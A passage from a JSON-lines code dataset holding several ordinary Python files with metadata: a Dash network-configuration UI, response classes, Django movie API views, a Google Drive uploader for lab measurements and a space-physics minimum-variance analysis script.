"django.conf.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 34, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 36, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 36, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 37, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 37, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 47, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "5582089803", "text": "import dash\nfrom dash import html, Input, Output, dcc, callback\nimport dash_bootstrap_components as dbc\nimport hashlib\nimport pathlib\nfrom functools import lru_cache\nfrom utils.add_ip import AddIP\nfrom utils.add_vlan import AddVLAN\nfrom utils.fiber_port import FiberPort\nfrom utils.network_port import NetworkPort\nfrom dash.exceptions import PreventUpdate\n\n\nclass BodyComponent:\n def __init__(self) -> None:\n self._id = hashlib.md5(\n str(pathlib.Path(__file__).absolute()).encode()).hexdigest()\n self.register_options = {\n 'ip': AddIP(),\n 'vlan': AddVLAN(),\n 'fiber': FiberPort(),\n 'network': NetworkPort(),\n }\n self.events()\n\n def id(self, name):\n return f\"{name}-{self._id}\"\n\n def load_data(self) -> None:\n pass\n\n @property\n def layout(self):\n self.load_data()\n return dbc.Container([\n dbc.Row([\n dbc.Col([\n html.H1('Datacom', style={'text-align': 'center'}),\n html.Hr(),\n html.H5('Configurar:'),\n dcc.RadioItems([\n 'Adicionar IP',\n \"Adicionar VLAN's\",\n 'Porta de fibra',\n 'Porta de Rede'\n ], id=self.id('select_config')),\n ], width=2),\n dbc.Col([\n dbc.Spinner(html.Div([\n ], id=self.id('output_config')))\n ], width=9)\n ])\n ])\n\n def events(self) -> None:\n @callback(\n Output(self.id('output_config'), 'children'),\n Input(self.id('select_config'), 'value'),\n prevent_initial_call=True\n )\n def altern_configs(value):\n if value == 'Adicionar IP':\n return self.register_options['ip'].layout\n if value == \"Adicionar VLAN's\":\n return self.register_options['vlan'].layout\n if value == 'Porta de fibra':\n return self.register_options['fiber'].layout\n if value == 'Porta de Rede':\n return self.register_options['network'].layout\n raise PreventUpdate\n", "repo_name": "Sidimar-Salla/Scripts_SSH", "sub_path": "components/body.py", "file_name": "body.py", "file_ext": "py", "file_size_in_byte": 2255, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "hashlib.md5", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.add_ip.AddIP", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.add_vlan.AddVLAN", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.fiber_port.FiberPort", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.network_port.NetworkPort", "line_number": 22, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Container", "line_number": 35, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 36, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 37, "usage_type": "call"}, {"api_name": "dash.html.H1", "line_number": 38, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 38, "usage_type": "name"}, {"api_name": "dash.html.Hr", "line_number": 39, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 39, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 40, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 40, "usage_type": "name"}, {"api_name": "dash.dcc.RadioItems", "line_number": 41, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 41, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 48, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 49, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 49, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 49, "usage_type": "name"}, {"api_name": "dash.exceptions.PreventUpdate", "line_number": 70, "usage_type": "name"}, {"api_name": "dash.callback", "line_number": 56, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 57, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "74402252284", "text": "# -*- coding: utf-8 -*-\n\nimport json\n\nclass ResponseBase(object):\n\t\"\"\"\n\t基类\n\t\"\"\"\n\t__slots__ = (\n\t\t'body',\n\t)\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef to_string(self):\n\t\traise NotImplementedError\n\nclass ErrorResponse(ResponseBase):\n\t__slots__ = (\n\t\t'code',\n\t\t'errMsg',\n\t\t'innerErrMsg',\n\t)\n\n\t@classmethod\n\tdef get_from_exception(cls, e):\n\t\tinstance = ErrorResponse(\n\t\t\tcode = e.code,\n\t\t\terrMsg = e.message,\n\t\t)\n\t\treturn instance\n\n\tdef __init__(self, code=500, errMsg='', innerErrMsg=''):\n\t\tself.code = code\n\t\tself.errMsg = errMsg\n\t\tself.innerErrMsg = innerErrMsg or errMsg\n\n\t\tsuper(ErrorResponse, self).__init__()\n\n\tdef to_string(self):\n\t\treturn json.dumps({\n\t\t\t'code': self.code,\n\t\t\t'errMsg': self.errMsg,\n\t\t\t'innerErrMsg': self.innerErrMsg\n\t\t})\n\nclass JsonResponse(ResponseBase):\n\n\t__slots__ = (\n\t\t'code',\n\t\t'data',\n\t)\n\n\tdef __init__(self, data):\n\t\tsuper(JsonResponse, self).__init__()\n\t\tself.code = 200\n\t\tself.data = data\n\t\tself.body = data\n\n\tdef to_string(self):\n\t\treturn json.dumps({\n\t\t\t'code': self.code,\n\t\t\t'data': self.data\n\t\t})\n\nclass RawResponse(ResponseBase):\n\n\tdef __init__(self, data):\n\t\tsuper(RawResponse, self).__init__()\n\t\tself.body = data\n\n\tdef to_string(self):\n\t\treturn self.body", "repo_name": "limoxi/rust", "sub_path": "rust/core/resp.py", "file_name": "resp.py", "file_ext": "py", "file_size_in_byte": 1192, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "29550971658", "text": "from django.forms.models import model_to_dict\nfrom django.http import JsonResponse\nfrom django.views.generic.detail import BaseDetailView\nfrom django.views.generic.list import BaseListView\nfrom movies.models import Filmwork\n\n\nclass MoviesApiMixin:\n model = Filmwork\n http_method_names = ['get']\n attributes = ('title',\n 'description',\n 'creation_date',\n 'rating',\n 'type')\n\n def get_queryset(self):\n return self.model.objects.prefetch_related('genres', 'persons')\n\n def render_to_response(self, context, **response_kwargs):\n return JsonResponse(context)\n\n def serialize(self, obj: Filmwork) -> dict:\n '''\n Returns the dict from Filmwork.\n\n Parameters:\n obj(Filmwork): object Filmwork to serialize\n\n Returns:\n data(dict): Serialized object Filmwork\n\n Необходим, т.к. сериализатор Django не умеет обрабатывать m2m связи\n в моделях, возвращая либо ошибку сериализации\n в случае с BaseDetailView, либо id связанной таблицы\n в случае с BaseListView\n '''\n data = model_to_dict(obj, fields=self.attributes)\n\n data.update({\n 'id': obj.id,\n 'genres': [genre.name for genre in obj.genres.all()],\n 'actors': [person.full_name for person in obj.persons.filter(\n personfilmwork__role='actor')],\n 'directors': [person.full_name for person in obj.persons.filter(\n personfilmwork__role='director')],\n 'writers': [person.full_name for person in obj.persons.filter(\n personfilmwork__role='writer')],\n })\n return data\n\n\nclass MoviesListApi(MoviesApiMixin, BaseListView):\n paginate_by: int = 50\n\n def get_context_data(self, *, object_list=None, **kwargs):\n queryset = self.get_queryset()\n paginator, page, queryset, is_paginated = self.paginate_queryset(\n queryset,\n self.paginate_by\n )\n context = {\n 'count': paginator.count,\n 'total_pages': paginator.num_pages,\n 'prev': page.previous_page_number() if page.has_previous() else None,\n 'next': page.next_page_number() if page.has_next() else None,\n 'results': [self.serialize(obj) for obj in page.object_list],\n }\n return context\n\n\nclass MoviesDetailApi(MoviesApiMixin, BaseDetailView):\n\n def get_context_data(self, object, **kwargs):\n return self.serialize(object)\n", "repo_name": "elezbar/new_admin_panel_sprint_2", "sub_path": "django_api/movies_admin/movies/api/v1/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2745, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "movies.models.Filmwork", "line_number": 9, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 21, "usage_type": "call"}, {"api_name": "movies.models.Filmwork", "line_number": 23, "usage_type": "name"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 38, "usage_type": "call"}, {"api_name": "django.views.generic.list.BaseListView", "line_number": 53, "usage_type": "name"}, {"api_name": "django.views.generic.detail.BaseDetailView", "line_number": 72, "usage_type": "name"}]} +{"seq_id": "19654050090", "text": "# run: pip install pydrive\r\n\r\nfrom pydrive.auth import GoogleAuth\r\nfrom pydrive.drive import GoogleDrive\r\nimport os\r\nfrom os import path\r\nimport itertools\r\n\r\nsettings_dir = 'Cloud_auth'\r\nauth_file = path.join(os.getcwd(), settings_dir, 'Google_auth.json')\r\nfolder_on_drive = \"Measurements\"\r\n\r\n\r\nclass GoogleDriveUploader:\r\n @staticmethod\r\n def __GetDrivePath(source_path):\r\n base, p1 = path.split(source_path)\r\n base2, p2 = path.split(base)\r\n return path.join(folder_on_drive, p2, p1)\r\n\r\n @staticmethod\r\n def __add_parent(dic, id_parent):\r\n dic['parents'] = [{'kind': 'drive#fileLink', 'id': id_parent}]\r\n\r\n def __create_folder(self, folder_name, parent_id=None):\r\n folder_metadata = {'title': folder_name, 'mimeType': r'application/vnd.google-apps.folder'}\r\n if parent_id is not None:\r\n self.__add_parent(folder_metadata, parent_id)\r\n\r\n folder = self.drive.CreateFile(folder_metadata)\r\n folder.Upload()\r\n\r\n return folder['id']\r\n\r\n def __is_object_exists(self, folder_name, parent_id=None):\r\n if parent_id is None:\r\n parent_id = 'root'\r\n strList = f\"'{parent_id}' in parents and trashed=false\"\r\n file_list = self.drive.ListFile({'q': strList})\r\n # a bug in the library: returns list of lists, not just list\r\n for cf in itertools.chain(*list(file_list)):\r\n if cf['title'] == folder_name:\r\n return cf['id']\r\n return None\r\n\r\n def __create_folders(self, full_path):\r\n if full_path[0] == r'/' or full_path[0] == '\\\\':\r\n full_path = full_path[1:]\r\n if full_path[-1] == r'/' or full_path[-1] == '\\\\':\r\n full_path = full_path[:-1]\r\n prev_id = None\r\n for subdir in full_path.split('\\\\'):\r\n curr_id = self.__is_object_exists(subdir, parent_id=prev_id)\r\n if curr_id is None: # if exists, then create\r\n prev_id = self.__create_folder(subdir, parent_id=prev_id)\r\n else:\r\n prev_id = curr_id # else leave existing folder\r\n return prev_id\r\n\r\n def __upload_file(self, filepath, folder_id=None):\r\n fname = path.split(filepath)[-1]\r\n dic = {'title': fname}\r\n if folder_id is not None:\r\n self.__add_parent(dic, folder_id)\r\n if self.__is_object_exists(fname, folder_id):\r\n print('File', fname, 'already exists, skipping...')\r\n f = self.drive.CreateFile(dic)\r\n f.SetContentFile(filepath)\r\n f.Upload()\r\n\r\n def __init__(self):\r\n try:\r\n gauth = GoogleAuth()\r\n gauth.DEFAULT_SETTINGS['client_config_file'] = path.join(os.getcwd(), settings_dir, 'client_secrets.json')\r\n\r\n if path.exists(auth_file):\r\n gauth.LoadCredentialsFile(credentials_file=auth_file)\r\n\r\n gauth.LocalWebserverAuth()\r\n gauth.SaveCredentialsFile(credentials_file=auth_file)\r\n\r\n self.gauth = gauth\r\n\r\n self.drive = GoogleDrive(gauth)\r\n except Exception as e:\r\n print('Google Drive authorization failed')\r\n self.gauth = None\r\n print(e)\r\n\r\n # uploads a folder with measurements results to Google drive\r\n # puts it into folder which name is specified by folder_on_drive variable\r\n # creates there two last folders from path\r\n def UploadMeasFolder(self, dir_path):\r\n print('Uploading results to Google drive...')\r\n try:\r\n folder = self.__GetDrivePath(dir_path)\r\n idFolder = self.__create_folders(folder)\r\n\r\n for f in os.listdir(dir_path):\r\n print('Uploading:', f)\r\n full_fpath = path.join(dir_path, f)\r\n self.__upload_file(full_fpath, idFolder)\r\n print('Data were successfully uploaded to:', folder)\r\n except Exception as e:\r\n print('Unable to upload data onto Google Drive')\r\n print(e)\r\n", "repo_name": "MukhanovaE/ColdDCMeasurements", "sub_path": "DC_Measurements/Lib/GoogleDrive.py", "file_name": "GoogleDrive.py", "file_ext": "py", "file_size_in_byte": 3981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "name"}, {"api_name": "pydrive.auth.GoogleAuth", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "name"}, {"api_name": "pydrive.drive.GoogleDrive", "line_number": 84, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "name"}]} +{"seq_id": "39925204235", "text": "# 0 uso modulo desde otro modulo\n# 1 uso modulo y quiero que me haga plots y los guarde\nMODO_mva = 0\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import ticker\nimport random\nimport statistics as st\nimport os\n\nfrom mag import shock_date\nimport coplanaridad_funciones as fcop\n\nfrom delimitacionshock import Bx, By, Bz, t_mag, Bu\nfrom subestructuras_calculos_2 import N\nB_vec = np.array([Bx, By, Bz]).T\n\npath_analisis = r'C:\\Users\\sofia\\Documents\\Facultad\\Tesis\\Analisis/{}/'.format(shock_date)\nif not os.path.exists(path_analisis):\n os.makedirs(path_analisis)\n\n#%% (EJEMPLO) datos 5:18:20.49 a 5:19:26 Oct 19 1984\n#\n#path = r'C:\\Users\\sofia\\Documents\\Facultad\\Tesis\\Ejercicio MVA cap8/'\n#t_mag, B_x, B_y, B_z, v_x, v_y, v_z, N = np.loadtxt(path+'datos.txt', skiprows = 1, unpack = True)\n#B_vec = np.array([B_x, B_y, B_z]).T\n# \n##unidades: T(s), B(nT), v(km/s), N(particles/cm^3)\n\n#%%----------------------------------- FUNCIONES GENERALES -------------------------------------------\n\n\n#elementos matriz de covarianza \ndef cov(x):\n A = np.empty([3,3])\n for i in range(3):\n for j in range(3):\n A[i,j] = np.mean(x[:,i]*x[:,j]) - np.mean(x[:,i])*np.mean(x[:,j])\n return A\n\n\n\n\n#reordenamiento de autovalores y autovectores (autovalores de mayor a menor)\ndef ordered(a, u):\n #autovectores ordenados de menor a mayor (provisorio)\n orden = np.argsort(a) #indices de elementos de a de menor a mayor\n w = [u[:,0], u[:,1], u[:,2]]\n w = np.array([w[i] for i in orden]).T\n #de mayor a menor\n x = np.array([w[:,2], w[:,1], w[:,0]]).T\n l= sorted(a, key = float, reverse = True)\n return(l, x)\n\n\n\n\n#errores autovectores (err_v[i,j] es el angulo de rot del autovector i respecto del autovector j) \ndef err_vec(m, l):\n err_v = np.empty([3,3])\n for i in range(3):\n for j in range(3):\n if i != j:\n err_v[i,j] = np.sqrt(l[2]/(m-1) * (l[i]+l[j]-l[2])/(l[i]-l[j])**2)\n if err_v[i,j] > np.pi : err_v[i,j] = abs(2*np.pi - err_v[i,j])\n else:\n err_v[i,j] = 0.0 #pongo esto porque la formula del error vale solo para i disntito de j\n return err_v\n\n\n\n\n#error estadistico de la componente normal del campo B (ie, error de )\ndef err_B(l_3, m, err_v32, err_v31, x, B):\n err_B3 = np.sqrt(l_3/(m-1) + (err_v32 * np.dot(B,x[1,:]))**2 + (err_v31 * np.dot(B,x[0,:]))**2)\n return err_B3\n\n\n\n\n#metodo bootstrap\ndef boot(B, Ns):\n \n norm = np.empty([Ns,3])\n b_mean = np.empty([Ns,3])\n E = np.empty([Ns,5]) #col de E: err_13 / err_13_grad / err_23 / err_23_grad / err_B3\n \n \n C = list(B)\n \n for i in range(Ns):\n \n b = [random.choice(C) for _ in range(len(C))]\n b = np.array(b)\n \n b_mean[i,:] = np.mean(b, axis = 0).T\n \n \n # HAGO MVA AL BOOTSTRAP SAMPLE:\n \n m = cov(b)\n q, z = np.linalg.eig(m) #cada columna de u es un autovector distinto (componentes en cada fila)\n #de mayor a menor:\n q, z = ordered(q, z)\n \n #fuerzo normal externa\n if z[0,2] < 0: z[:,2] = - z[:,2]\n \n #armo terna con los autovectores respetando x3 normal exterior\n w = np.array([z[:,0], np.cross(z[:,2],z[:,0]), z[:,2]]) #cada fila es un autovector distinto\n \n# w = np.array([z[:,0], z[:,1], z[:,2]]) # vectores asi como salen (para test)\n \n #renombro todo para no tener mil variables.\n norm[i,:] = w[2,:]\n \n #errores\n err_w = err_vec(len(b[:,0]), q) #en radianes\n err_w_grad = err_w*180/(np.pi) #en grados\n err_bw3 = err_B(q[2], len(b[:,0]), err_w[2,1], err_w[2,0], w, np.mean(b, axis = 0))\n \n E[i,0] = err_w[0,2]\n E[i,1] = err_w_grad[0,2]\n E[i,2] = err_w[1,2]\n E[i,3] = err_w_grad[1,2]\n E[i,4] = err_bw3\n \n return E, norm, b_mean\n\n\n#%%################################################################################################################\n###################################################################################################################\n###################################################################################################################\n###################################################################################################################\n#%%------------------------------ MATRIZ DE COV: AUTOVALORES Y AUTOVECTORES --------------------------------------\n\n\nM = cov(B_vec)\na, u = np.linalg.eig(M) #cada columna de u es un autovector distinto (componentes en cada fila)\n#de mayor a menor:\nl, y = ordered(a, u)\n\n#fuerzo normal externa (componente en x_MSO positiva)\nif y[0,2] < 0: y[:,2] = - y[:,2] \n\n#como M es simetrica, los autovectores son ortonormales\n#pero pueden formar una terna no necesariamente en el orden (x1,x2,x3)\n#lo fuerzo respetando que x3 sea normal externa\nx = np.array([y[:,0], np.cross(y[:,2],y[:,0]), y[:,2]]) #cada fila es un autovector distinto\n\n#x = np.array([y[:,0], y[:,1], y[:,2]]) #como salen de la matriz\n\n##corrijo signos para el ejemplo\n#sgn = np.array([-1,-1])\n#x = np.array([sgn[0]*y[:,0], sgn[1]*np.cross(y[:,2],y[:,0]), y[:,2]])\n\n\n# componentes del campo magnetico a lo largo de cada autovector\nB1 = np.empty(len(B_vec[:,0]))\nB2 = np.empty(len(B_vec[:,0]))\nB3 = np.empty(len(B_vec[:,0]))\n\nfor m in range(len(B_vec[:,0])):\n B1[m] = np.dot(B_vec[m,:], x[0,:])\n B2[m] = np.dot(B_vec[m,:], x[1,:])\n B3[m] = np.dot(B_vec[m,:], x[2,:])\n \n\n#angulo con Bu\nthetaMVA = fcop.alpha(Bu,x[2,:])\n\n#\nav_Bx3 = np.mean(B_vec, axis = 0)\n \n\n# errores \n\nm = len(B_vec[:,0])\n\n#errores de los autovectores (la componente ij es la rotacion del autovector i respecto del j)\nerr_x = err_vec(m, l) #en radianes\nerr_x_grad = err_x*180/(np.pi) #en grados\n\n#máximo cono de error para la normal\ncono_err_x3 = max(err_x_grad[2,0],err_x_grad[2,1])\n\n\n#error (en unidades de campo magnetico)\nerr_Bx3 = err_B(l[2], m, err_x[2,1], err_x[2,0], x, av_Bx3)\n\n\n#%% ESTUDIO Bn\n\nif MODO_mva == 1:\n \n fignum = 0\n figsize = (30,15)\n font_title = 30\n font_label = 30\n font_leg = 26\n lw = 1\n colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n ticks_l = 6\n ticks_w = 3\n grid_alpha = 0.8\n \n \n plt.figure(fignum, figsize = figsize)\n plt.suptitle(r'Componente normal del campo magnético - MVA', fontsize = font_title)\n plt.plot(t_mag, B3, linewidth = lw, color = colors[0])\n plt.axhline(y = 0, linewidth = lw, linestyle = 'dotted', color = colors[9])\n plt.ylabel(r'$B_n$ [nT]', fontsize = font_label)\n plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n plt.grid(which = 'both', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n \n plt.savefig(path_analisis+'Bn_mva{}'.format(shock_date))\n plt.savefig(path_analisis+'Bn_mva{}.pdf'.format(shock_date))\n\n\n#%% HODOGRAMAS\n\nif MODO_mva == 1:\n \n fignum = 0\n figsize = (20,15)\n font_title = 30\n font_label = 30\n font_leg = 26\n lw = 1\n msize = 15\n colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n ticks_l = 6\n ticks_w = 3\n xtick_spacing = 10\n ytick_spacing = 10\n grid_alpha = 0.8\n \n \n f, (g1, g2) = plt.subplots(1,2, figsize = figsize)\n plt.subplots_adjust(top=0.92, bottom=0.10, left=0.10, right=0.95, hspace=0.25, wspace=0.35)\n \n \n g1.plot(B2, B1, linewidth = lw)\n g1.plot(B2[0], B1[0], 'go', ms = msize, label = r'$t_i$')\n g1.plot(B2[-1], B1[-1], 'gX', ms = msize, label = r'$t_f$')\n g1.axvline(x=0, linewidth = lw, color = 'k')\n g1.axhline(y=0, linewidth = lw, color = 'k')\n g1.set_xlabel(r'$\\vec{B} \\cdot \\vec{x}_2$', size = font_label)\n g1.set_ylabel(r'$\\vec{B} \\cdot \\vec{x}_1$', size = font_label)\n g1.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n g1.xaxis.set_major_locator(ticker.MultipleLocator(xtick_spacing))\n g1.yaxis.set_major_locator(ticker.MultipleLocator(ytick_spacing))\n g1.legend(loc = 0, fontsize = font_leg)\n g1.grid(which = 'both', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n \n g2.plot(B3, B1, linewidth = lw, color = 'r')\n g2.plot(B3[0], B1[0], 'go', ms = msize, label = r'$t_i$')\n g2.plot(B3[-1], B1[-1], 'gX', ms = msize, label = r'$t_f$')\n g2.axvline(x=0, linewidth = lw, color = 'k')\n g2.axhline(y=0, linewidth = lw, color = 'k')\n g2.set_xlabel(r'$\\vec{B} \\cdot \\vec{x}_3$', size = font_label)\n g2.set_ylabel(r'$\\vec{B} \\cdot \\vec{x}_1$', size = font_label)\n g2.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n g2.xaxis.set_major_locator(ticker.MultipleLocator(xtick_spacing))\n g2.yaxis.set_major_locator(ticker.MultipleLocator(ytick_spacing))\n g2.legend(loc = 0, fontsize = font_leg)\n g2.grid(which = 'both', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n \n \n plt.savefig(path_analisis+'hodogramas_mva{}'.format(shock_date))\n plt.savefig(path_analisis+'hodogramas_mva{}.pdf'.format(shock_date))\n \n\n#%%################################################################################################################\n###################################################################################################################\n###################################################################################################################\n###################################################################################################################\n#%%------------------------------ METODO BOOTSTRAP --------------------------------------\n\nE, x3, b_medio = boot(B_vec,1000)\n\nb3 = np.empty(len(x3))\nfor i in range(len(x3)):\n b3[i] = np.dot(b_medio[i,:],x3[i,:])\n\n\n\n# promedios bootstrap y desviaciones estandar\n \nb3_av = np.array([np.mean(b3), st.stdev(b3)])\nerr13_av = np.array([np.mean(E[:,0]), st.stdev(E[:,0])])\nerr23_av = np.array([np.mean(E[:,2]), st.stdev(E[:,2])])\n\n#normal calculada como el promedio componente a componente normalizado\nnormal_boot = np.array([np.mean(x3[:,0]), np.mean(x3[:,1]), np.mean(x3[:,2])])/(np.linalg.norm(np.array([np.mean(x3[:,0]), np.mean(x3[:,1]), np.mean(x3[:,2])])))\n\n\n# histogramas bootstrap\n\nhist_b3, bin_b3 = np.histogram(b3, np.linspace(-6,9,100))\nhist_err13, bin_err13 = np.histogram(E[:,0], np.linspace(-0.5,0.5,50))\nhist_err23, bin_err23 = np.histogram(E[:,2], np.linspace(-0.3,0.3,50))\n\n\n\n\n\n\n\n\n", "repo_name": "sofiaburne/Tesis", "sub_path": "MVA.py", "file_name": "MVA.py", "file_ext": "py", "file_size_in_byte": 10582, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "delimitacionshock.Bx", "line_number": 18, "usage_type": "name"}, {"api_name": "delimitacionshock.By", "line_number": 18, "usage_type": "name"}, {"api_name": "delimitacionshock.Bz", "line_number": 18, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 20, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 88, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 168, "usage_type": "call"}, {"api_name": "coplanaridad_funciones.alpha", "line_number": 172, "usage_type": "call"}, {"api_name": "delimitacionshock.Bu", "line_number": 172, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 184, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 212, "usage_type": "call"}, {"api_name": "delimitacionshock.t_mag", "line_number": 212, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 